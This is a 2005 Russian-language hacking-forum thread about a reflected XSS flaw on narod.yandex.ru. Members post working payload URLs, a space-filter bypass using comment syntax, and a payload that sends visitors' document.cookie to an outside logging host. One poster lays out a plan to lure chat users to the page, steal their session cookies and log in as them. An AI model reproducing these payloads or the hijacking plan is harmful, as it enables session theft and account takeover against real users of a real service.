xss на народ.ру

Discussion in 'Уязвимости' started by vectorg, 22 Sep 2005.

  1. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    хз чё это такое, смотрите сами

    http://narod.yandex.ru/100.xhtml?</font><script>alert('XSS by VectorG')</script><font>
     
    1 person likes this.
  2. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    гы

    А зачем Font ? там и так всё круто...

    http://narod.yandex.ru/100.xhtml?<script>alert(document.cookie)</script>

    respekt , карочи...
    это круто, ща кавонть оприходуем ))
     
    1 person likes this.
  3. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Странно у меня даже не что и не вылезло.
     
  4. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    font чтоб красивее было... ))))
    просто "Вы скачиваете файл с сайта alert(document.cookie)<>http://>http://" както каряво

    неужели до меня это никто не публиковал??? я чёто погоречился тему создавать, просто потом подумал xss простейшая наверняка уже ктото нашёл...
     
    #4 vectorg, 22 Sep 2005
    Last edited: 22 Sep 2005
  5. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    странно..... у двоих работает.....
     
  6. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Что могу сказать у кого опера у того она не вылезет. У кого эксплолер тогда вылезает респект тебе =)).
     
  7. WeKSTiK

    WeKSTiK New Member

    Joined:
    15 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Эту багу наверное пол инета до тебя нашло! ;)
     
  8. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    да я и не спорю... просто некоторые не знали... для них и выложил... ;)
     
  9. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    просто не публиковали
     
    _________________________
  10. Dmitro

    Dmitro Elder - Старейшина

    Joined:
    11 Dec 2004
    Messages:
    105
    Likes Received:
    10
    Reputations:
    13
    ды

    Подобных шалостей везде хватает, но на народе ))))
    я даже и не думал, что всё так банально...


    Как говорится темнее всего у фонаря...
     
  11. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    да я и сам сначала сомневался, просто нада было прогу скачать с народовсково сайта, в адресе была очень интересная строчка, я сразу подумал что на таком то сайте фень не пройдёт, но мои ожидания не оправдались... )))))))))
     
    #11 vectorg, 22 Sep 2005
    Last edited: 22 Sep 2005
  12. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    Скажите как её можно использовать ?
     
  13. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Ага, а то у меня просто вылезло яндексуид и ещё что-то...Зачем это нужно?
     
  14. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    попробуй через осла посмотреть ;)

    по ходу дела смысла от неё никакого... хотя если кто чё найдёт суйте сюда
     
    #14 vectorg, 23 Sep 2005
    Last edited: 23 Sep 2005
  15. Kanick

    Kanick Elder - Старейшина

    Joined:
    6 Sep 2005
    Messages:
    59
    Likes Received:
    30
    Reputations:
    32
    Обработчик обрезает до первого слэша, поэтому от закрывающей "</script>" остается лишь "<".

    Ну так чего, я и не думал, что на Народе будут показываться Яндексовские куки! Это ведь огромный простор для снифферства и т.п.!
     
    #15 Kanick, 23 Sep 2005
    Last edited: 23 Sep 2005
  16. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    насчёт слэша тоже не так всё просто, например такая бадья проходит:

    http://narod.yandex.ru/100.xhtml?</font><script>location.replace('http://narod.ru')</script><font>

    единственное пробелы не обрабатываются:
    та же самая вставка картинки <img src=""> не проходит изза пробела, он в конечном случае идёт как %20 и весь код изпахабивается
     
    #16 vectorg, 23 Sep 2005
    Last edited: 23 Sep 2005
  17. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    пробел можешь комментом попробовать заменить: <img/**/src="">
     
    _________________________
  18. vectorg

    vectorg Противоядие

    Joined:
    7 Aug 2005
    Messages:
    335
    Likes Received:
    140
    Reputations:
    236
    СПАСИБА!!!!! ВСЁ РАБОТАЕТ!!!!

    у меня мысль такая, сидеть в чате на народе, дать челу ссылку на свой "супер мега сайт", когда он заходит на него, через location.replace делается перевод на страницу с xss со снифером, я беру куки, заменяю их, и сижу под его логином... по моему это слишком наивно ...)))) единственное с той страницы берётся всё кроме session_id, как её вытащить?
     
    #18 vectorg, 23 Sep 2005
    Last edited: 23 Sep 2005
  19. Kanick

    Kanick Elder - Старейшина

    Joined:
    6 Sep 2005
    Messages:
    59
    Likes Received:
    30
    Reputations:
    32
    Кстати, кто-нибудь может внятно ответить, почему IE 6 при вызове document.cookie выдает не все куки для данного домена? Чаще всего отсутствует тот, что содержит информацию о сессии.

    Вот вам пример запроса:
    http://narod.yandex.ru/100.xhtml?</font><script>img=new/**/Image;img.src="http://antichat.net/s/s.gif?"+document.cookie;</script><font>

    Результат - http://antichat.net/s/log.php
     
    #19 Kanick, 23 Sep 2005
    Last edited: 23 Sep 2005
  20. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    а никто не в курсе на народе пассы хешируются вообще? если да то чем? А то никогда там акка не имел.